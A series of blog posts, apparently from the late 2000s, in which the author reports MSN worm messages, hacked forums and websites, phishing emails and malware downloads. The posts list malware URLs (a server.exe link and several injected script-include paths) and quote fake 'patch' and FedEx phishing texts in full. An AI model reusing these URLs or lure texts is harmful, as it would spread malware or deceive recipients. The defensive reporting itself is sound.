I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The code is unescaped text using eval. It’s an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source code on the page complains that the template file can’t be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the website might not be what’s hidden in the hacked site (in other words, finding the hacked code isn’t easy - better remove everything and reupload from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.

This hack has been mentioned online as early as 2007, and a year ago, and it’s been mentioned as serving malware, but this site was recently hacked, as far as I know.  According to others who had that happen, the hack was done through php scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.

Here’s an analysis of who is behind this (Nov 2007)

I received an e-mail that attempted to (in Spanish) getting me to log in somewhere. The link was fake, and pointed somewhere else than it appeared to.

It pointed to an exe file (haven’t tested the exe file) in a folder that turned out to be the docs folder in a phpBB installation. A 2.0.x version. That folder had obviously been compromised, and a lot of scripts had been placed there. The forum appears to have been installed September 2006, but the phpBB files were last modified a year later. Some of the files have dates before that, but probably were uploaded in such a way the original file date was preserved?

I’ve notified the site admin, so let’s see if he responds and tells us what happened. I assume this is a vulnerability that’s been fixed in newer versions of phpBB?

I’ve got an old Invision forum. The latest free version. And yes, I know, it’s a bad idea. But it’s been the only solution for having a decent featured pre-moderated forum for a while, unless you want to pay for the software.

So, it’s gotten hacked a few times. And this last time it was embarassing:

They posted AS ME!

The topic title was “please help”, and the content was one link:

blueice77.com/server.exe

I haven’t checked out the program. I’ll leave that to the security geeks. My forum wasn’t the only one that got hacked like that. They always post as one of the admins, and there’s nothing more than the link in the post.

IP used: 195.22.229.24

It’s an open proxy, so doesn’t help much. And the user agent is the latest English language Firefox version.

The website with the exe file on it appears to have been hacked. The file existed on the server when I tested it, though I don’t know what it contains. Since it’s been hacked, I won’t post the whois here, and I’ll contact the owner.
And on the topic of pre-moderation (I only checked for php software): vBulletin and Invision has pre-moderation. But they’re both commercial software (except for the old version of Invision, that’s got more security holes than a sieve), so not an option for all. Simple Machines and phpBB have promised pre-moderation in the next major version. phpBB has a release candidate with pre-moderation currently available. miniBB has pre-moderation currently, but the new posts will show - you just can’t see the content until approved.

I just got this e-mail, twice to the same address:

Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install this patch to remove worm files
and stop email sending, otherwise your account will be blocked.

Customer Support Robot

Under the text “this patch”, there’s a link to an IP address with some encrypted looking URL. Different IP addresses for each mail. Both of them already have socket error, so I can’t check out what it contained.

Shaking head… There’s a discussion on “alt.madcrew” about this. Some people who appear to have taken the e-mail at face value. One of them writes:

installed the patch too but now my computer has become very slow and
even when I am not doing anything on my computer my hard drive makes a
lot of noise as if there is a lot of activity, I don’t understand

Someone e-mailed me an example of a hacked site (the hack is currently offline, with the hacked version set up on a hidden page for me to check).

Update: Lots of homepages affected. Check this google search.

It was the homepage of the company that was hacked, with a few links added at the bottom. In addition to those two visible links, there are some hidden links that are identical to the links you’ll find if you follow the .txt links. The links are only visible if you check the source code, so I believe the txt files are meant as includes in the hacked php file.

The first link is: buybeer4me.info/scr/18.txt

It’s got some obfuscated javascript that actually points to the second link:

bestrezult.com/scr/1.txt

The links in that document point to another hacked site:

dinuba.ca.gov/minutes/agendas/.~ss/

When I loaded one of the pages referenced in the spam, I got this. Keep in mind that I had images disabled, so the page might look somewhat …different in reality:

It’s obviously malicious, and I found a post referring to the site it’s loaded from:

mvsps

I went by a website today that had a rather nasty payload. After a search on the site that delivered a search result, the page disappeared and a page from amaena.com loaded instead. I’m always very careful when those appear. I close the windows that pop up (I use Firefox with pop up protection) with Alt-F4. Even so, the Winfixer exe file started downloading and was caught by my anti-virus.

The ad was delivered by ad2profit.com

I’ve never in the past experienced a forced download of Winfixer, so I’m wondering what’s up?

During the night thousands of e-mail addresses connected with people in Denmark have received an e-mail purportedly from fedex.com. It’s written in what appears to me to be perfect Danish, and promises 15 % off if they send in the form attached to the mail. Only the “form” is not a form. It’s an executable with a random numeric name, and containing the virus TR/Spy.Bzub.B.

Some journalists in Denmark originally thought hackers had gotten into fedex and sent out those e-mails. But the e-mails were sent out to random Danish addresses, including inactive ones - both customers and non-customers of Fedex. And I got a sample of the headers, and will paste them in here (the relevant bits). Notice that it doesn’t even come from Denmark:

Received: from 66-195-105-206.static.twtelecom.net [66.195.105.206] by recipientsmailserver2.dk with ESMTP
(SMTPD-8.22) id AA310348; Wed, 18 Apr 2007 22:06:09 +0200
Return-Path:
Received: from 209.205.25.170 (HELO smtp.albert-white.com)
by recipientsmailserver.dk with esmtp (/-26A4FH5 LU6Z)
id 4ESG>0-/FYYK7-OR
for recipient@recipientsmailserver.dk; Wed, 18 Apr 2007 20:06:27 +0600
Message-ID: <01c781f5$0c516520$6c822ecf@gblk>
From: “FedEx”
To:
Subject: Kvittering
Date: Wed, 18 Apr 2007 20:06:27 +0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”—-=_NextPart_000_0007_01C781CB.237B5D20″
X-Priority: 3
X-MSMail-Priority: Normal

Notice how it’s got two received lines? The MX record for the e-mail address is for the recipientsmailserver.dk, while there’s another mailserver at the same IP number named recipientsmailserver2.dk (all recipient info munged). So I’m slightly unsure where that mail really came from… The twtelecom address is blocklisted at psbl.surriel.com for another spamrun on April 5

Here’s the text of the e-mail:

Æredede kunde,

Til Deres navn og adresse ankom der en pakke.

De vil få en modtagelseskvittering vedføjet til brevet.

Vær så venlig at åbne brevet og udfylde kvitteringen for at få pakken i den nærmeste FedEx afdeling.

De kan få adressen af den nærmeste FedEx afdeling på side fedex.com

Forbered en forsendelse online ved FedEx og spar på tiden, som De kan bruge til noget andet. De kan få informationer om priser, kan bestille afhentning og emballage, kan overvåge alle Deres forsendelser ved tracking dem derhjemme, osv, på fedex.com.

Registreres De nu, får De 15% rabat på FedEx Express tjenester online for 4 måneder fra registreringsdato.

Deres ærbødige,

Kundeservice

FedEx

Update:

Danish Computerworld has an article today about the speculation that a Baltic group is behind the mail, which they call a phishing mail. According to Peter Kruse at Csis, the virus is designed to spread over instant messengers and web based mail services. It supposedly uses templates (if I translated the Danish word skabeloner right), so I suppose that means it actually sends out messages in people’s names. There was a phishing attempt earlier regarding Tele2, and they feel the method is fairly similar (the use of templates). The command center that the virus phones home to is in Russia, and Danish internet providers have blocked access to it, in order to protect Danish surfers.

Three Russians were sentenced to 8 years of hard time for extortion in connection with denial of service attacks.

Anna from Kaspersky told me in June that there was a Russian law that could be used against cybercrime, but that it hadn’t been used so far. That mirrors what they said in their blog yesterday. This is a very important sentence, even if the sentencing reflected the extortion more than the cybercrime.

Other news reports:

Informationweek, Securityfocus

There’s a new vulnerability in Windows, that Microsoft isn’t going to patch until October 10. In the meantime, Webattacker is pushing out exploits for it.

The vulnerability is for Internet Explorer. If you’re using Firefox, you’re safe from that particular vulnerability.

But how many of us have friends, co-workers and family who insists on using Internet Explorer, because it’s familiar?

ZERT has released a patch for the vulnerability, according to Eweek. It also mentions that Gadi Evron, bothunter extraordinaire, is operations manager for ZERT.